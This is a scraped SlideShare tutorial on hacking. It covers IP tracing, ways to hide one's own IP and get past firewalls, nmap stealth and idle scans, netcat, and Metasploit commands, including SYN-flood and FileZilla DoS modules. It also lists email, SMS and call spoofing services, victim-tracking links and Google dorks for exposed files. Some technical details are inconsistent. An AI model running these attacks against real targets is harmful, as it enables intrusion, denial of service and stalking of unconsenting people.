SlideShare una empresa de Scribd logo

Hacking

Descargar como DOCX, PDF
Praveen P
Praveen P
1 de 17
is a hacker ? A Hacker is NOT a criminal A hacker is Somebody who thinks outside the box. Wants to test his limits Wants to try things that are not in the manual Has unlimited curiosity Discovers unknown features about technology Dedicated to knowledge Beleives in stretching the limits Highly creative Hackers vs. Crackers Hackers Crackers Very knowledgeable Good guy Bad guy Help improve security Want to cause cyber destruction Strong ethics No ethics Have prior permission No prior permission Job opportunities: Banking, Telecom, IT/IteS/BPO/KPOs, ecommerce, military, police, retail industry, etc. Hacking into a computer is just like breaking into a house. Steps of a hacker: 1. Identify the victimInformation Gathering 2. Find a loophole/network reconnaissance 3. Actual attack/hack/break in 4. Escape without a trace Identify the victim:- Anatomy of an IP address:- An IP address is something anologous to your mobile phone number. It is something which uniquely identifies your presence on the internet. It is a 32-bit address which is divided into four fields of 8-bit each containing numbers betwen 1 and 255. By simply studying an IP address, we can easily reveal a lot of information about the network the victim belongs to. Different classes of an IP address Class Range Network/Host IDs A 0.0.0.0 to 126.255.255.255 NETWORK.HOST.HOST.HOST B 128.0.0.0 to NETWORK.NETWORK.HOST.HOST 191.255.255.255 C 192.0.0.0 to NETWORK.NETWORK.NETWORK.HOST 223.255.255.255 D 224.0.0.0 to Multicast IP addresses. They are IP addresses set 239.255.255.255 aside for special purposes E 240.0.0.0 to Not in use 255.255.255.255 XX.YY.AA.BB network ID host ID Class A: XXX YY.AA.BB
Class B: XXX.YY AA.BB Class C: XX.YY.AA BB Special IP addresses: Use IP address Local loopback address 127.0.0.1 Private IP Address: to be used for computers Class A Network inside a private network or LAN 10.0.0.0 – 10.255.255.255 Class B Network 172.16.0.0 – 172.31.255.255 Class C Network 192.168.0.0 – 192.168.255.255 Converting IP addresses into different formats: Format IP Address Decimal 171.67.215.200 Binary 10101011.01000011.11010111.1001000 Octal 253.103.327.310 Hexadecimal 00AB.0043.00D7.00C8 http://www.csgnetwork.com/ipaddconv.html Windows Scientific calculator Tracking victim IP address www.spypig.com – use to find out the IP address of the victim via sending a tracking image to victim„s email id. http://www.getnotify.com/ http://didtheyreadit.com/ http://www.politemail.com/ - commonly used in corporate world http://readnotify.com/ - creates tracking file like a word or pdf file. How to trace an email back to its sender ? 1st technique:- Step 1: Open email headers (Show original option in gmail. In yahoo. Email settings->full headers) Step 2: Analyze email headers Manually (the headers contain IP address) or automatically (2nd technique)using emailtrackerpro (http://www.emailtrackerpro.com/) 3rd technique:- http://blasze.com/iplog/ Simply send a crafted link to your friend Now we have ORIGINAL URL and VICTIM URL DISGUISED URL: using URL shortening website s www.bit.ly www.goo.gl 4th technique: www.whatismyipaddress.com How to find out victim„s IP address using a website ? Step 1: create your own website/webpage/blog Step 2: in the homepage, write a java code to extract IP address and MAC address of victim Step 3: Invite the victim(s) 5th technique: Using chatting software (not a reliable technique though) Setup a chat with victim and put the below command in dos prompt- netstat –n 6th technique:- TCPView Software http://technet.microsoft.com/en- us/sysinternals/bb897437.aspx Currports http://www.nirsoft.net/utils/cports.html
How to trace an IP address to exact geographical location ? http://visualroute.visualware.com/ NeoTrace pro http://neotrace-pro.en.softonic.com/ 3d traceroute http://www.d3tr.de/ loriot pro http://www.loriotpro.com/ geospider http://oreware.com/viewprogram.php?prog=22 http://vtrace.pl/ All are online versions of the simple traceroute command Ex: tracert www.indiatimes.com Trace a mobile phone number to its geographical location http://trace.bharatiyamobile.com/ Tracking stolen smartphone https://www.lookout.com/ create a lookout account and register your device. Summary - What to do to be a hacker - What is IP address - How to get somebody„s IP address - How to trace the IP address„s exact geographic location - How to track a mobile phone - How to trace a lost smartphone Internal and External IP addresses Introduction to NAT (Network Address Translation) When the internet was initially created, there was no shortage of any IP addresses. However, as internet usage spread, an acute shortage of IP addresses was created worldwide This led to emergence of Network Address Translation. Advantages of NAT are- It Reduces need for IP addresses, Improves security and Easier implementation of networks In a NAT system, nobody from outside world will know IP address of an internal system. - Identity is protected - No direct connection
In a NAT enabled system, a person from outside, first have to hack into the router before trying to get into the internal system. Depending upon the entension number entered, the lookup table is used to route the call to the appropriate internal system. How to find out internal IP address & external IP address ? Internal IP address can be found using netstat –n ipconfig /all External IP address can be found on http://whatismyipaddress.com/ How to hide your IP address ? by using a proxy server http://www.anonymizer.ru – online tool/web proxy Most of the russian proxy websites are free None of them maintain any record or log files http://samair.ru/proxy/ http://www.hidemyass.com/ - uses URL encoding so that ”facebook” does not appear on URL Torrents:- How torrents are blocked ? - Disabling torrent clients Solution- http://www.bitlet.org/ - Block download of .torrent extension files Solution- http://www.torrent2exe.com/ http://txtor.dwerg.net/ The perfect cyber crimes are commited by effectively hiding your presence on the internet. Your presence on the internet can be spoofed or tricked by hiding your IP address as well as by hiding your system„s MAC address plus with a lethal technique called war driving. Difference between IP address and MAC address IP address MAC address Given by ISP/Network Given by manufacturer and it is static 2 types- static IP address and dynamic IP Your hardware Network Interface Card (NIC) address like ethernet card, wifi card, bluetooth, etc has its unique MAC address DOS command to get your internal IP DOS command to get their respective MAC address is– addresses is Ipconfig /all getmac To get your external IP address, open your web browser and goto http://whatismyipaddress.com/ The perfect cyber crimes are commited by- Proxy bouncing – IP hiding or IP spoofing (Ultrasoft) MAC spoofing – (MACAddressChanger, MacMakeUp-doesnt work on windows XP, MadMacs, EtherChange, BWmachak) War driving – driving on the streets with a laptop and scan for unprotected Wifi networks (inssider, Netstumbler, Kismet, Airsnort and War Chalking) Onion routing protocol – provides anonymous, secure, encrypted access to the internet. Ex- TOR
How TOR is better than proxy servers ? TOR is available as free download from http://www.torproject.org.in/ How to unblock TOR ? - Change the name of the downloaded TOR exe file - In the TOR„s proxy settings, change the default port number - Add bridge relay server URLs to TOR from https://bridges.torproject.org/ Bridge relays (or "bridges" for short) are Tor relays that aren't listed in the main directory. Since there is no complete public list of them, even if your ISP is filtering connections to all the known Tor relays, they probably won't be able to block all the bridges. Incase https://bridges.torproject.org/ is blocked, another way to find public bridge addresses is to send mail to bridges@torproject.org with the line "get bridges" by itself in the body of the mail. However, so we can make it harder for an attacker to learn lots of bridge addresses, you must send this request from an email address at one of the following domains: gmail.com yahoo.com Types of Proxy servers – SOCKS and HTTP HTTP proxy servers – allow you to bypass filtering mechanisms and access blocked content. User sends HTTP request to proxy server, who then reads the Host header in the HTTP request, connects to the target server and transmits back whatever data the server sends back. Usually, it works only with HTTP apps. Ex:- anonymizer.com SOCKS proxy servers allows you to bypass filtering mechanisms and access blocked content. SOCKS is a protocol that transmits data between source and destination cia a proxy server without reading any of the contents. Hence it works with all protocols like TCP, UDP, etc. And will allow you to use all applications (like mail, browsing, downloading files, etc.) . Ex- TOR TOR works on port number 9051. Using TOR, you can hide yourself in skype or any other instant messenger, There are 2 ways to do this- - Connect the application to TOR - Connect the application to a proxy
- Both cases requires an IP address and port number. Goto skype tools options connection settings  proxy Give proxy IP as 127.0.0.1 and port number 9051. Tools:- Multiproxy (http://multiproxy.org/multiproxy.htm) – allows you to keep proxies all in the same session. It supports both HTTP and SOCKS. You just need to feed this software with the proxy servers. SOCKSCHAIN http://ufasoft.com/socks/ Connects you to a chain of SOCKS or HTTP proxies (Proxy bond) ProxyFire http://www.proxyfire.net/ Ultrasurf https://ultrasurf.us/ - Anonumous browsing from your pendrive. It encrypts connection, hides your IP and unblocks stuff. You can even configure a proxy inside ultrasurf if your college/organization requires a proxy server to connect to. Virtual Private Network (VPN) A VPN is a group of computers connected privately through a public network like Internet. Usually VPN services gives you an encrypted, secure and anonymous communication channel. Popular VPN services are:- HideMyAss, IPVanish, StrongVPN, BoxVPN, 12VPN and GoTrusted. VPN is like a proxy but in a private network. If Ultrasulf/SOCKS or proxy services doesn„t work as expected, a VPN service is used. VPN servers, like proxy servers can be in different parts of the world. Theseservers provide better spped than proxy servers VPNs are used to access blocked videos in Internet. Ex:- http://www.hidemyass.com/vpn/ HTTP Tunneling Assume that inside your network, FTP, some websites/torrents are blocked by your firewall. But no firewall blocks all traffic. HTTP tunneling disguises blocked sites as regular/allowed http traffic. Let us assume that in your college/company, FTP protocol (port 21) is blocked or torrents are blocked. The firewall only allows HTTP traffic on port 80, all other ports are blocked. It is possible to encapsulate FTP or torrent traffic inside HTTP protocol and bypass the firewall. Step 1:- Install HTTP tunneling software server on your home or outside computer that has unrestricted access. Step 2:- Install HTTPTunneling software client on your college/office computer that has restricted access. Step 3:- Now your connection diagram is as follows YOU FTP or torrent software HTTP Tunneling client  sends FTP or torrent traffic encapsulated into HTTP protocol via port 80 to bypass firewall  HTTP Tunneling server on Home Computer  FTP or Torrent Destination
Now you can use college computer to access everything on your home network including unrestricted internet. Ex:- Tunnelizer, HTTPort and HTTPTunnel are good HTTPTunneling tools. Super Network Tunnel (http://www.networktunnel.net/) is a commercial tool to perform 2 way HTTP Tunneling Home networkcollege network Some cool stuffs:- PSIPHON (http://psiphon.ca/) Proxy workbench (http://proxyworkbench.com/) Reverse text:- http://www.textmechanic.com/ Upside down text (http://www.upsidedowntext.com/) Proxy Workbench (http://proxyworkbench.com/) People Hacking:- Whatever we do online are tracked in some website. http://www.pipl.com/ http://www.spokeo.com/ http://www.anywho.com/ http://www.intelius.com/ google maps street view google earth satellite view Network reconnaissance and Information gathering 2nd step to hacking Network reconnaissance is the process of finding out as much information about victim as possible. Typically an attacker is trying to find out the following about the victim- - Victim is online/offline - Network topography - DNS information - List of open ports - DNS information - Names and versions of software running open ports - OS details - Possible security loopholes Techniques:- PING sweeping, Traceroute DNS related tools LAN surveyors Port scanning Daemon Banner Grabbing OS fingerprinting Security Auditing
How to execute the attack Ping sweeping Ping is used to check the connectivity between your computer and the remote computer (whether you are online, whether victim is online and whether there is connectivity between both of you) Ping is used for Denial of Service (DoS) attacks, OS and firewall detection purposes. Popular sweeping tools are nmap (http://nmap.org/) http://ping.eu/ Ping using Nmap:- nmap –sn –v www.google.com (-sn means No port scan) Ping by bypassing firewall nmap –sn –v –Pn www.google.com Instead of using ICMP echo requests, it connects to port 80 -sn === perform ping. -v == verbose mode (gives you detailed information about what it is doing) ICMP echo requests/replies can easily be blocked by a firewall. Hence, -Pn option attempts to connect to the website or port 80 of www.google.com Ping sweeping allows you to ping entire range of computers nmap –sn –v 203.94.1.0-255 Angry IP scanner – ping sweeping tool Traceroute When data packets travel from source to destination system, then they do not always take the same path, Traceroute is a tool that allows you to trace a path between two systems. Originally it was designed for network troubleshooting but commonly used for - OS detection - Firewall detection - Network topology information - Geographical location of the target system How to guess the Operating system running on a remote computer by simply using PING and TRACEROUTE ? Time to live (TTL) is a mechanism that limits the lifespan or lifetime of data in a computer or network. TTL value gets reduced by one everytime data packet reaches a router. The initial TTL value is determined by the operating system. If I am able to find out the initial TTL value of a data packet sent by the victim, I can guess the operating system running on the victim Different Operating systems have different TTL values. Final TTL value = Initial TTL value-No. of routers Steps to know what OS www.altoromutual.com is running (it is legal to hack this URL) Step 1:- E:Documents and SettingsSYS>ping www.altoromutual.com Pinging altoromutual.com [65.61.137.117] with 32 bytes of data: Reply from 65.61.137.117: bytes=32 time=290ms TTL=117 Reply from 65.61.137.117: bytes=32 time=290ms TTL=117 Reply from 65.61.137.117: bytes=32 time=289ms TTL=117 Reply from 65.61.137.117: bytes=32 time=290ms TTL=117
Ping statistics for 65.61.137.117: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 289ms, Maximum = 290ms, Average = 289ms Inference:- Final TTL value = 117 117 = Initial TTL value – No. of router hops Step 2:- E:Documents and SettingsSYS>tracert www.altoromutual.com Tracing route to altoromutual.com [65.61.137.117] over a maximum of 30 hops: 1 <1 ms <1 ms <1 ms 192.168.1.1 2 22 ms 23 ms 25 ms ABTS-KK-Static-001.228.178.122.airtelbroadband.i n [122.178.228.1] 3 20 ms 21 ms 21 ms ABTS-KK-Static-217.32.166.122.airtelbroadband.in [122.166.32.217] 4 20 ms 21 ms 21 ms AES-Static-025.102.22.125.airtel.in [125.22.102. 25] 5 185 ms 178 ms 176 ms 125.62.187.189 6 177 ms 178 ms 178 ms ldn-b2-link.telia.net [213.248.71.17] 7 177 ms 178 ms 178 ms ldn-bb2-link.telia.net [80.91.247.26] 8 290 ms 291 ms 291 ms nyk-bb2-link.telia.net [80.91.248.254] 9 * * * Request timed out. 10 * 290 ms 288 ms rackspace-ic-127247-dls-bb1.c.telia.net [213.248 .88.174] 11 290 ms 289 ms 291 ms coreb.dfw1.rackspace.net [74.205.108.52] 12 291 ms 291 ms 291 ms core5.dfw1.rackspace.net [74.205.108.27] 13 290 ms 294 ms 289 ms 67.192.56.19 14 291 ms 289 ms 289 ms 65.61.137.117 Trace complete. E:Documents and SettingsSYS> Inference:- Count the number of hops. Eliminate 1st entry (which is source) and last entry (which is destination) and do not count request timeouts. = 11 router hops Final TTL value = 113 No. of router hops = 11 117 = Initial TTL value – 11 Initial TTL value = 128 Step 3:- Now google search for default TTL values of different Operating Systems. From the URL, http://www.binbert.com/blog/2009/12/default-time-to-live-ttl-values/ TTL value 128 corresponds to some windows based operating system running on victim (www.altoromutual.com) Domain Name Server A DNS lookup is a query sent by a user (browser or IM or email client) to a DNS server to convert a particular domain name to its respective IP address. www.whois.net www.iptools.com www.betterwhois.com
www.dnsstuff.com www.dnstools.com www.zoneedit.com/lookup.html Port Scanning:- Port scanning is the art of scanning a remote target system to obtain a list of open virtual ports on it that are listening for connections. This is usually one of the first few steps every criminal takes. Popular port scanning tools: nmap, strobe, superscan, etc. It allows a criminal to identify any potential entry points into a target computer. The followind covers how to see open ports on some remote computer. Popular Ports:- 21 FTP 23 Telnet 25 SMTP 53 DNS 80 HTTP 110 POP3 443 SSL/https 513 rlogin TCP Packet format:- Flag Types – SYN == Start a new connection FIN == End a connection existing RST == Error Notification ACK == Data Received Successfully How are connections established on the Internet ? 3 Step/3 Way TCP/IP Handshake (===== > meaning sends) Step 1: Client (me)===== > SYN Packet ====== > Host (Google) Step 2: Host ======== >SYN/ACK Packet====== > Client Step 3: Client ======= > ACK Packer ==== > Host Hoe are connections terminated ? 2 steps:-
Step 1: Client === > FIN Packet ===== > Host Step 2: Host == > ACK Packet ===== > Client (Reverse also needs to happen) It is possible to create your own packets using colasoft packet builder (Packet Generator) and Komadia Packet Crafter which is available as free download on the internet. TCP CONNECT Port Scan/ TCP Handshake Port Scan:- Port scan establishes a full 3-way TCP/IP Handshake with all ports on the remote system. Procedure:- ATTACKER sends SYN Packet to TARGET OPEN:- TARGET sends back a SYN/ACK Packet CLOSED:- TARGET sends back a RST/ACK Packet ATTACKER sends ACK/RST Packet back to TARGET Advantages:- Very accurate, no countermeasures Disadvantages:- Attacker is Easily Detected/caught Nmap command:- nmap –sT –p1 – 100 –Pn www.altoromutual.com -sT TCP Connect Port Scan -p Port Range Second type of scan where detection is difficult is 1) TCP SYN Port Scan/Half Open Scan/Stealth Scan. Also known as Half Open scan because only half of the complete 3-way TCP/IP handshake is executed. ATTACKER sends SYN Packet to TARGET OPEN: TARGET sends back a SYN/ACK Packet No Third Step (Unlike previous scan). Considered stealth. Can be detected using PortSentry on Unix platform (http://sourceforge.net/projects/sentrytools/) nmap –sF –p1-100 –Pn www.altoromutual.com NULL/XMAS Port Scan – Stealth but unreliable and varied responses nmap –sX –p1-100 www.altoromutual.com (all flags set as 1) nmap –sN –p1-100 www.altoromutual.com (all flags set as 0) 2) IDLE Port Scan (Blind Port Scanning): Very useful for attacker It port scans the victim without sending even a single packet to the victim from own IP address. Every system has fragment ID number which is a 4 digit number that is increased by 1 each time a packet is sent by it. Step 1: Probe a zombie machine for their fragment ID. ATTACKER ===== > sends SYN/ACK packet ======= > ZOMBIE ZOMBIE ======= > sends back a RST packet with Fragment ID ==== > ATTACKER Assume recorded fragment ID = 1012. Step 2: Send spoofed SYN Packet from zombie to victim OPEN: Victim sends SYN/ACK to Zombie. Zombie sends back a RST and increased its fragment ID by 1 and becomes 1013. CLOSED: Victim sends RST to Zombie who discards RST packet and does not change its fragment ID.
Step 3: Probe the fragment ID of Zombie again. If fragment ID increased by 1, then port on victim is open, else it is closed. nmap –Pn –p 1-100 –sI <ZOMBIE/Friend‟s IP address> www.altoromutual.com -sI == > idle port scan 3) ACK Port Scan/Firewall detection scan Nmap –sA –pN –p 1-100 www.altoromutual.com This type of scan can be used to determine presence of a firewall filtering out data packets. ATTACKER sends ACK packet to TARGET FIREWALL PRESENT: No response FIREWALL NOT PRESENT: Target sends back RST Packet. Other command line port scanning tool: scanline, hping3, etc. Countermeasures: - Foolproof countermeasures against port scanning do not exist. - Close as many ports as possible. - Filter out certain packets using firewalls, ACLs and other filters using tools like Scanlogd, BlackICE, Abacus, Portsentry, snort, etc. Daemon Banner Grabbing It helps you confirm your guess about the victim Operating System. Once you get to know list of installed software on victim system, the attacker google searches for installed software vulnerabilities. Daemon banner grabbing: It is the process of getting useful information about the target system by recording the welcome banners of the daemons running on various ports. It can be used to get the following information about the target system o Daemon name and version number o OS information o Most important, to identify possible points of entry nmap –sV –p 1-100 www.altoromutual.com Scanline:- sl –v –bt 1-100 www.altoromutual.com Manual technique using Putty (Telnet client) Telnet to port 80 of victim Close window on exit option should be set as never Type HEAD/HTTP/1.0 and press enter. You will get the victim‟s daemon banner as output. HTTPRecon http://www.computec.ch/projekte/httprecon/ Countermeasures: Edit default daemon message ensuring critical information is not revealed. Misguide attacker by displaying dales daemon banners. Use a long false daemon banner and in the background record information about the attacking client and try to trace him/her.
NetCat Netcat is one of the most popular and widely used networking utilities on the internet. It can be used to read and write network connections. It is widely used by both criminals and system administrators. Netcat is used for- - Listening to a port - Connecting to a port - File transfer - Chatting - Executing applications - Sending spoofed HTTP probes - Proxy servers - Port scanning, etc. It is also used to probe a remote computer for open ports and daemon/software running on the open ports. Netcat commands (command line tool): nc –v www.altoromutual.com 80 HTTP/1.0 Ncat is improved, better version, which comes free with Nmap. ncat –C www.altoromutual.com 80 get http/1.0 ncat –l 127.0.0.1 8080 opens a port on local machine. Open browser and type 127.0.0.1:8080/ Nothing happens in the browser. In the command prompt, ncat managed to record some information about browser. This technique can be used to trace attackers. Transferring files using ncat: ncat –l 7000 > output.txt (opens port 7000 and accepts input on it, which will be saved in output.txt) Ncat 127.0.0.1 7000 <input.txt Operating System (OS) Detection It is important for an attacker to determine what OS is running on the target system. 2 most effective techniques are- Active Fingerprinting Passive Fingerprinting Different OS have different stacks. Hence, different OS responds differently to the same packet sent to it by same system. This difference in response is used as a benchmark of differentiating between various operating systems. Active Fingerprinting: is the process of actively sending data packets to the target system to generate a response, which is then analyzed and compared to the list of
known responses to determine the OS running on the target system. Typically while analyzing responses, the following fields & techniques can be useful- TCP Initial Window Size of packets TTL values ACK Values of packets Initial Sequence Number (ISN) values Handling of overlapped fragments, etc The attacker can be traced. That means this method is not anonymous. Nmap commands:- nmap –O –v www.altoromutual.com nmap –A –v www.altoromutual.com Passive Fingerprinting Problem with active fingerprinting is that it reveals the identity of the criminal http://lcamtuf.coredump.cx/p0f3/ P0f will try to determine the OS information by simply analyzing the data packets sent by the target system while performing usual and routine communication like if target visits your website, sends you a file, etc. p0f –L . p0f –i 4 (interface number) TTL, window size, DF Bit and TOS fields in the reply TCP packet is analyzed to get remote OS. OS Detection Countermeasures Change the default values of your OS like TTL, ISN, etc. Mislead attacker by configuring default values of some other OS on your system. Use ACLs to filter out unwanted probing packets. Security Auditing It is a technique of scanning the victim computer for any potential security loopholes that may exist on it, using which an attacker can hack into it. Tools: Nessus, GFI Languard, Retina Scan, SAINT, Core Impact, NSAuditor (Not Free) Attacking target computer using METASPLOIT In my previous blog, I have covered detailed step by step instructions on how to collect maximum information about victim in pursuit of getting any possible weak entry points. It is popularly called Vulnerabilities. Once you get any possible loopholes or vulnerabilities, it is the perfect time to ATTACK!!! Metasploit is an open source framework for penetration testing that allows you to test the security of a network. It had a built in large database of hundreds of known
loopholes and vulnerabilities for various platforms and software. It allows you to automatically test a remote system for all these hundreds of security loopholes. EXPLOIT: is a code, software or tool that misuses a vulnerability or loophole on a remote machine to cause malicious results on it. PAYLOAD: is defined as the effect of executing the exploit code and some other payload code on a remote machine, which allows a medium of communication to be established between the attacker and the victim. It could be in the form of modification/deletion of data, getting shell access, file access and others. Each EXPLOIT will support certain type of PAYLOADS. STEPS INVOLVED 1. Identify loophole on victim using network reconnaissance, security auditing and penetration testing. 2. Select and configure that exploit and various exploit options on metasploit. 3. Select victim computer and victim port. 4. Select payload you wish to launch with exploit code. 5. Launch the attack. Metasploit Commands: >help >banner >connect www.altoromutual.com 80 Get /HTTP/1.0 >ping www.altoromutual.com >show exploits >show payloads >show auxiliary >search type:exploit platform: windows unsafe >info windows/tftp/quick_tftp_pro_mode >use windows/tftp/quick_tftp_pro_mode windows/tftp/quick_tftp_pro_mode>show options windows/tftp/quick_tftp_pro_mode>set RHOST altoromutual.com windows/tftp/quick_tftp_pro_mode>check windows/tftp/quick_tftp_pro_mode>exploit windows/tftp/quick_tftp_pro_mode>back (exit a module) Port scanning using Metasploit It is possible to port scan a remote computer using metasploit. All nmap commands are valid in metasploit. >search portscan >use auxiliary/scanner/portscan/tcp >use auxiliary/scanner/portscan/syn (SYN port scan) >use auxiliary/scanner/portscan/xmas (XMAS port scan) >use auxiliary/scanner/portscan/ack (ACK port scan) >show options >set RHOSTS www.victim.com >set RPORTS 1-100 >set verbose true >run
>nmap –sT –p 1-100 –Pn www.victim.com Daemon Banner Grabbing using metasploit >use auxiliary/scanner/pop3/pop3_version >set RHOSTS www.victim.com >run Similarly, >use auxiliary/scanner/pop3/http_version >set RHOSTS www.victim.com >run >use auxiliary/scanner/pop3/smtp_version >set RHOSTS www.victim.com >run (SMTP runs on port 25, port 80 is HTTP and port 110 is POP3) Grabbing Email Addresses from a website >search collector >use auxiliary/gather/search_mail_collector >show options >set domain www.victim.com >run TCP flooding using metasploit It is possible to execute a DOS attack against various victims using metasploit >use auxiliary/dos/tcp/synflood >set RHOST www.victim.com >run FileZilla is a popular FTP server based on windows platform. There are 2 exploit modules in metasploit that can be used to execute a DOS attack against some versions of the FileZilla server >use auxiliary/dos/windows/ftp/filezilla_admin_user >set RHOST www.victim.com >run >use auxiliary/dos/windows/ftp/filezilla_server_port >set RHOST www.victim.com >run Disposable email (anonymous): www.hidemyass.com. Email Spoofing: is the art of sending a spoofed email from somebody else‟s email account. www.anonymizer.in/fake-mailer SMS Spoofing: (Paid service but may be worth) http://www.spranked.com/ http://www.phonytext.com/ Call Spoofing: http://www.mobivox.com
Google Dorks Google Hacking or Google Dorking is the use of clever google search tags or commands to try and reveal sensitive data about victims like password files, vulnerable servers and others. A google dork, according to a hacker slang is somebody whose sensitive data is revealed with the use of Google Hacking or Google Dorking. Examples: info:<web address> cache:www.facebook.com password (retrieve old cached copy of webpage) link:www.flyingmachine.co.in allintitle:Login allintitle:Login+site:timesofindia.com allinurl:password login allinurl:password login+site:www.google.com inurl:/view.index.shtml (access live cameras) inurl:/view.indexFrame.shtml Axis ext:pdf hacking site:gov inurl:admin login site:in inurl:admin login intitle:intranet inurl:intranet+site:in “Welcome to phpMyAdmin” AND “Create new database” “index of /etc/passwd” Google Hacking Database (GHDB) http://www.hackersforcharity.org/ghdb/ Website Mirroring

Recomendados

What is my IP address by Truly Explorer
What is my IP address by Truly ExplorerWhat is my IP address by Truly Explorer
What is my IP address by Truly Explorer
Rohit Bhawani
 
Hacking tutorial
Hacking tutorialHacking tutorial
Hacking tutorial
MSA Technosoft
 
Hacking 1224807880385377-9
Hacking 1224807880385377-9Hacking 1224807880385377-9
Hacking 1224807880385377-9
Geoff Pesimo
 
Hacking In Detail
Hacking In DetailHacking In Detail
Hacking In Detail
Greater Noida Institute Of Technology
 
Wi fi
Wi fiWi fi
Wi fi
Rohit Shaw
 
Hacking
HackingHacking
Hacking
rameswara reddy venkat
 
Hacking
HackingHacking
Hacking
Roshan Chaudhary
 
Ceh v5 module 05 system hacking
Ceh v5 module 05 system hackingCeh v5 module 05 system hacking
Ceh v5 module 05 system hacking
Vi Tính Hoàng Nam
 

Recomendados

What is my IP address by Truly Explorer
What is my IP address by Truly ExplorerWhat is my IP address by Truly Explorer
What is my IP address by Truly Explorer
Rohit Bhawani
 
Hacking tutorial
Hacking tutorialHacking tutorial
Hacking tutorial
MSA Technosoft
 
Hacking 1224807880385377-9
Hacking 1224807880385377-9Hacking 1224807880385377-9
Hacking 1224807880385377-9
Geoff Pesimo
 
Hacking In Detail
Hacking In DetailHacking In Detail
Hacking In Detail
Greater Noida Institute Of Technology
 
Wi fi
Wi fiWi fi
Wi fi
Rohit Shaw
 
Hacking
HackingHacking
Hacking
rameswara reddy venkat
 
Hacking
HackingHacking
Hacking
Roshan Chaudhary
 
Ceh v5 module 05 system hacking
Ceh v5 module 05 system hackingCeh v5 module 05 system hacking
Ceh v5 module 05 system hacking
Vi Tính Hoàng Nam
 
Ip address
Ip address Ip address
Ip address
tanvirahmed638
 
Reconnaissance & Scanning
Reconnaissance & ScanningReconnaissance & Scanning
Reconnaissance & Scanning
amiable_indian
 
Easy IP Addressing and Subnetting Manual for Starters
Easy IP Addressing and Subnetting Manual for StartersEasy IP Addressing and Subnetting Manual for Starters
Easy IP Addressing and Subnetting Manual for Starters
S Khawaja
 
Cracking Into Embedded Devices - HACK.LU 2K8
Cracking Into Embedded Devices - HACK.LU 2K8Cracking Into Embedded Devices - HACK.LU 2K8
Cracking Into Embedded Devices - HACK.LU 2K8
guest441c58b71
 
Wi-FI Hacking
Wi-FI Hacking Wi-FI Hacking
Wi-FI Hacking
Mehul Jariwala
 
WIFI; making a wireless connection
WIFI; making a wireless connectionWIFI; making a wireless connection
WIFI; making a wireless connection
Webster University
 
What is an ip address
What is an ip addressWhat is an ip address
What is an ip address
Dooremoore
 
Lecture9
Lecture9Lecture9
Lecture9
Vedpal Yadav
 
Ceh v5 module 10 session hijacking
Ceh v5 module 10 session hijackingCeh v5 module 10 session hijacking
Ceh v5 module 10 session hijacking
Vi Tính Hoàng Nam
 
Reconnaissance - For pentesting and user awareness
Reconnaissance - For pentesting and user awarenessReconnaissance - For pentesting and user awareness
Reconnaissance - For pentesting and user awareness
Leon Teale
 
Z wave controller z-box quick start guide
Z wave controller z-box quick start guideZ wave controller z-box quick start guide
Z wave controller z-box quick start guide
Domotica daVinci
 
Ip address classes
Ip address classesIp address classes
Ip address classes
Harikiran Raju
 
Ceh v5 module 04 enumeration
Ceh v5 module 04 enumerationCeh v5 module 04 enumeration
Ceh v5 module 04 enumeration
Vi Tính Hoàng Nam
 
Chapter04 ip addressing networking
Chapter04 ip addressing networkingChapter04 ip addressing networking
Chapter04 ip addressing networking
Ainuddin Yousufzai
 
Ceh v5 module 21 cryptography
Ceh v5 module 21 cryptographyCeh v5 module 21 cryptography
Ceh v5 module 21 cryptography
Vi Tính Hoàng Nam
 
Ip addressing upload
Ip addressing uploadIp addressing upload
Ip addressing upload
Debasis Dwibedy
 
Cyber security and ethical hacking 3
Cyber security and ethical hacking 3Cyber security and ethical hacking 3
Cyber security and ethical hacking 3
Mehedi Hasan
 
Introduction To Ethical Hacking
Introduction To Ethical HackingIntroduction To Ethical Hacking
Introduction To Ethical Hacking
Neel Kamal
 
Ip address
Ip addressIp address
Ip address
Prem Sahu
 
IBPS SO
IBPS SOIBPS SO
IBPS SO
Jitendra kadu
 
adhoc network workshop
adhoc network workshopadhoc network workshop
adhoc network workshop
Ali Nezhad
 
Ip address and subnet masking final
Ip address and subnet masking finalIp address and subnet masking final
Ip address and subnet masking final
NeerajBhardwaj57
 

Más contenido relacionado

La actualidad más candente

Cracking Into Embedded Devices - HACK.LU 2K8
Cracking Into Embedded Devices - HACK.LU 2K8Cracking Into Embedded Devices - HACK.LU 2K8
Cracking Into Embedded Devices - HACK.LU 2K8
guest441c58b71
 
WIFI; making a wireless connection
WIFI; making a wireless connectionWIFI; making a wireless connection
WIFI; making a wireless connection
Webster University
 
Z wave controller z-box quick start guide
Z wave controller z-box quick start guideZ wave controller z-box quick start guide
Z wave controller z-box quick start guide
Domotica daVinci
 

La actualidad más candente (15)

Ip address
Ip address Ip address
Ip address
 
Reconnaissance & Scanning
Reconnaissance & ScanningReconnaissance & Scanning
Reconnaissance & Scanning
 
Easy IP Addressing and Subnetting Manual for Starters
Easy IP Addressing and Subnetting Manual for StartersEasy IP Addressing and Subnetting Manual for Starters
Easy IP Addressing and Subnetting Manual for Starters
 
Cracking Into Embedded Devices - HACK.LU 2K8
Cracking Into Embedded Devices - HACK.LU 2K8Cracking Into Embedded Devices - HACK.LU 2K8
Cracking Into Embedded Devices - HACK.LU 2K8
 
Wi-FI Hacking
Wi-FI Hacking Wi-FI Hacking
Wi-FI Hacking
 
WIFI; making a wireless connection
WIFI; making a wireless connectionWIFI; making a wireless connection
WIFI; making a wireless connection
 
What is an ip address
What is an ip addressWhat is an ip address
What is an ip address
 
Lecture9
Lecture9Lecture9
Lecture9
 
Ceh v5 module 10 session hijacking
Ceh v5 module 10 session hijackingCeh v5 module 10 session hijacking
Ceh v5 module 10 session hijacking
 
Reconnaissance - For pentesting and user awareness
Reconnaissance - For pentesting and user awarenessReconnaissance - For pentesting and user awareness
Reconnaissance - For pentesting and user awareness
 
Z wave controller z-box quick start guide
Z wave controller z-box quick start guideZ wave controller z-box quick start guide
Z wave controller z-box quick start guide
 
Ip address classes
Ip address classesIp address classes
Ip address classes
 
Ceh v5 module 04 enumeration
Ceh v5 module 04 enumerationCeh v5 module 04 enumeration
Ceh v5 module 04 enumeration
 
Chapter04 ip addressing networking
Chapter04 ip addressing networkingChapter04 ip addressing networking
Chapter04 ip addressing networking
 
Ceh v5 module 21 cryptography
Ceh v5 module 21 cryptographyCeh v5 module 21 cryptography
Ceh v5 module 21 cryptography
 

Similar a Hacking

adhoc network workshop
adhoc network workshopadhoc network workshop
